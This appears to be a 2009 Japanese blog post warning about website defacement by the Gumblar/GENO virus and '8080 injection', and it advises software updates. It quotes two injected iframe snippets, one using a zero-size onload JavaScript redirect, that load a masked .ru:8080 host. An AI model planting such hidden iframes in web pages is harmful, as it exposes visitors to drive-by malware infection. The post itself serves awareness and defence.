ここから本文です
サイトの改ざん、コンピュータウイルス・セキュリティ、検索エンジンYahoo!/Googleらへん...☆彡

書庫全体表示

 ブラウザでページを単に見ただけでウイルスが発動してしまう恐れのある「ウェブ改ざん」による不正なコードの埋め込み。今年の5月には、「Gumblarウイルス」(通称「GENOウイルス」)のパンデミックが話題になりましたーな。
正規Web改ざんによるウイルス感染を防ぐには (トレンドマイクロ インターネット・セキュリティ・ナレッジ)

 「GENOウイルス」騒動ほどでないにしろ、今現在でも改ざんされて陥落してる日本国内の一般サイトをたま〜に見かけます。これはページを運営してる人のマシンが、FTPのパスワードを抜くコンピュータウイルスに感染し、外部から不正なコードをページに挿入されてしまう形。:(
Macの端末からだと「攻撃サイトとして報告されています!」〜 (Yahoo!知恵袋)
ホームページのウイルス?スパム?について・・・ (OKWave)

 ちなみに、ここ数週間で何だか目立ってるのが、ロシアドメインへ飛ばすインラインフレームのタグ。「8080攻撃」「8080インジェクション」と呼ばれてるシロモノです。Googleで検索すると、これについて問い合わせてる海外のフォーラムなどのページがたくさんヒットします。(改ざんの実例画像
<iframe src="http://●●●●.ru:8080/index.php" width=** height=**></iframe>
 不正なコードが埋め込まれ「ウイルス発信サイト」へ変貌してしまったページがGogoleの検索結果にヒットすると、『このサイトはコンピュータに損害を与える可能性があります。』と表示され、アクセスがブロックされる場合があります。(Yahoo!検索にはこういう機能はないん)

 ウイルス対策ソフトを導入しとくのは当然ながら、改ざんによる攻撃手法は、多くが有名ソフトウェアの旧バージョンにある不具合(脆弱性)を悪用するので、ちゃんと最新版が入ってるか確認しましょ! :)
・Microsoft系ソフトウェアの更新 → Windows Update
・Adobe系 (Flash Player/Adobe Reader)
 Apple QuickTime
 RealPlayer などの更新



(10月18日 追記...)
 何だか不正なコードが変わり始めてますなぁ。インラインフレームのonload属性にJavaScriptタグを用意して飛ばすスタイル。
<iframe frameborder="0" onload="if (!this.src){ this.src='http://●●●●.ru:8080/index.php'; this.height='0'; this.width='0';}" >(意味のない英文字の羅列)</iframe>



(追記...)
2009年10月、再来襲したGumblar(GENOウイルス)対策

顔アイコン

顔アイコン・表示画像の選択

絵文字
×
  • オリジナル
  • SoftBank1
  • SoftBank2
  • SoftBank3
  • SoftBank4
  • docomo1
  • docomo2
  • au1
  • au2
  • au3
  • au4
  • 名前
  • パスワード
  • ブログ

本文はここまでですこのページの先頭へ
みんなの更新記事